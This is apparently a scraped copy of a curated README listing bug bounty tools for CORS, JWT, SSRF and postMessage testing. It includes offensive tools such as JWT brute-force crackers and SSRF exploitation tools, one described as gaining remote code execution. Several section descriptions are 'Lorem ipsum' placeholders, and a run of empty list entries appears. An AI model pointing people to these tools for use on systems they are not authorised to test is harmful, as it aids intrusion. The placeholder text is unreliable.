
4.8 KiB

Awesome Bug Bounty Tools Awesome

Curated list of various bug bounty tools



Lorem ipsum dolor sit amet

CORS Misconfiguration

Lorem ipsum dolor sit amet

  • Corsy - CORS Misconfiguration Scanner
  • CORStest - A simple CORS misconfiguration scanner
  • cors-scanner - A multi-threaded scanner that helps identify CORS flaws/misconfigurations

JSON Web Token

Lorem ipsum dolor sit amet

  • jwt_tool - A toolkit for testing, tweaking and cracking JSON Web Tokens
  • c-jwt-cracker - JWT brute force cracker written in C
  • jwt-heartbreaker - The Burp extension to check JWT (JSON Web Tokens) for using keys from known from public sources
  • jwtear - Modular command-line tool to parse, create and manipulate JWT tokens for hackers
  • jwt-key-id-injector - Simple python script to check against hypothetical JWT vulnerability.

Server Side Request Forgery

Lorem ipsum dolor sit amet

  • SSRFmap - Automatic SSRF fuzzer and exploitation tool

  • Gopherus - This tool generates gopher link for exploiting SSRF and gaining RCE in various servers

  • ground-control - A collection of scripts that run on my web server. Mainly for debugging SSRF, blind XSS, and XXE vulnerabilities.

  • Gf-Patterns - GF Paterns For (ssrf,RCE,Lfi,sqli,ssti,idor,url redirection,debug_logic, interesting Subs) parameters grep

  • SSRFire - An automated SSRF finder. Just give the domain name and your server and chill! ;) Also has options to find XSS and open redirects

  • httprebind - Automatic tool for DNS rebinding-based SSRF attacks

  • ssrf-sheriff - A simple SSRF-testing sheriff written in Go

  • B-XSSRF - Toolkit to detect and keep track on Blind XSS, XXE & SSRF

  • extended-ssrf-search - Smart ssrf scanner using different methods like parameter brute forcing in post and get...

  • gaussrf - Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl and Filter Urls With OpenRedirection or SSRF Parameters.

  • ssrfDetector - Server-side request forgery detector

  • grafana-ssrf - Authenticated SSRF in Grafana

  • sentrySSRF - Tool to searching sentry config on page or in javascript files and check blind SSRF

  • -

  • -

  • -

  • -

  • -

  • -

  • -

  • -


Lorem ipsum dolor sit amet

  • postMessage-tracker - A Chrome Extension to track postMessage usage (url, domain and stack) both by logging using CORS and also visually as an extension-icon
  • PostMessage_Fuzz_Tool - #BugBounty #BugBounty Tools #WebDeveloper Tool


Contributions welcome! Read the contribution guidelines first.



To the extent possible under law, vavkamil has waived all copyright and related or neighboring rights to this work.